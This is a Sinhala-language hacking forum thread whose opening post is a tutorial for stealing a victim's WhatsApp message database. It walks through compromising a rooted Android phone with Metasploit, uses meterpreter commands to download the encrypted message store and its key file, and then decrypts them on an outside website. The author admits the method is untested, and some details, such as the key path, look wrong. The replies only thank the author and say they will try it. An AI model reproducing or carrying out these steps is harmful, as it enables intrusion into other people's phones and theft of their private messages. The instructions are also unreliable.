1. සමාවන්න. වෙබ් අඩවි‍යේ ඇති ලිපි බැලීමට හැකියාව ඇත්තේ සාමාජිකයන්ට පමණි. එබැවින් මෙතන ක්ලික් කර සාමාජිකත්වය ලබාගන්න. ගිණුමක් සාදන ආකාරය දැන ගැනීමට මෙතන ක්ලික් කරන්න.
  2. තම ෆේස්බුක් ගිණුම හරහා ෆෝරමයේ ලියාපදිංචිය සිදු කර ගත් අය හට ෆෝරමයට ලොග් විය නොහැකි බව ආරංචි විය. ඔබටත් එසේ සිදූ වී ඇත්නම් ඇත්නම් Forget password යන්න භාවිතා කර අලුත් password එකක් සාදාගෙන ලොග් වන්න. ගැටලුවක් පවතී නම් rulemax567@gmail.com වෙත email එකක් එවන්න.
    Dismiss Notice
Dismiss Notice
ආයුබෝවන් Guest ඔබ කැමතිද අපගේ Security Services එක සමග එකතු වී වැඩ කරන්න එසේනම් මෙතනින් එන්න

TUTORIAL Hack Whatsapp Database[Not Tested]

Discussion in 'Hacking Tutorials' started by Thilina Nimesh, Nov 26, 2017.

  1. Thilina Nimesh

    Thilina Nimesh සාමාජික

    Likes:
    49
    Comments:
    65
    Trophies:
    18
    මුලින්ම කියන්න ඕනෙ මේක මං test කලේ නෑ....මේකට root කරපු phone එකක් තියෙන්න ඕනෙ victim ගාව!


    හරි එහෙනම් වැඩේට බහිමු!


    මුලින්ම port forward කරගෙන වැඩේට බහින්න Over the internet කරන්න යනවනම්....මේ video එක බලන්න ඒක කරන හැටි -


    හරි දැන් victim ගෙ android device එකට ඇතුල් වෙන්න ඕනෙ....මේකට metasploit-framework එකෙන් පුලුවන්....ඉතින් මේක කරන හැටි මේ video එකේ තියනව-


    දැන් meterpreter එක open වෙයි...ඒකෙ මෙහෙම කරන්න!

    cd /

    මේකෙන් 4n එකේ root එකට යනව!දැන් ඒකෙ තියන folder බලන්න මෙහෙම type කරන්න...

    ls

    Phone memory folder නම හොයාගන්න(මගෙ sdcard)දැන් ඒකට යමු...මෙහෙම type කරන්න...

    cd sdcard

    දැන් whatsapp folder එකට

    cd WhatsApp

    Database folder එකට යන්න

    cd Databases

    folder එකේ තියන දේවල් බලන්න...

    ls

    දැන් පෙන්නයි database file....ඒක download කරගන්න...

    download msgstore.db.crypt12

    හරි පලවෙනි පියවර හරි....

    -------------------------------------------------------

    දැන් database key එක ගන්න ඕනෙ...මේකට තමා root access ඕනෙ....දැන් මෙහෙම type කරන්න....

    cd /data/data/files/com.whatsapp/key

    දැන් ඒකෙ තියන key file එක download කරගන්න.....

    download key.db

    දෙවෙනි පියවරත් හරි....

    -------------------------------------------------------------------

    හරි දැන් තමා database එක dycript කරන්න තියෙන්නෙ....මුලින්ම මේ site එකට යන්න!

    http://whatcrypt.com/

    ඕකට ගිහින් අර file දෙක upload කරල database එක ගන්න....

    හරි ඔහොමතමා කරන්න තියෙන්නෙ....


    මේකෙ අවුල් ඇති මොකද test කලේ නෑනෙ!

    එහෙනම් තවත් tut එකකින් හම්බෙමු!
     
    #1
    mr.silent and SPEED like this.
  2. mr.silent

    mr.silent සාමාජික

    Likes:
    38
    Comments:
    50
    Trophies:
    18
    kalekin apuwama issellama dakapu post eka.:)
    karalama balamu.:D
    thanks machan!!
     
    #2
    Shadow likes this.
  3. Thread Starter
    Thilina Nimesh

    Thilina Nimesh සාමාජික

    Likes:
    49
    Comments:
    65
    Trophies:
    18
    Ela bro karala aniwa kiyanna...mn gawa rooted 4n ekak na oya wade test karanna
     
    #3
    mr.silent likes this.
  4. Shadow

    Shadow Administrator
    Staff Member Gold Member

    Likes:
    357
    Comments:
    480
    Trophies:
    63
    Ela
     
    #4

Share This Page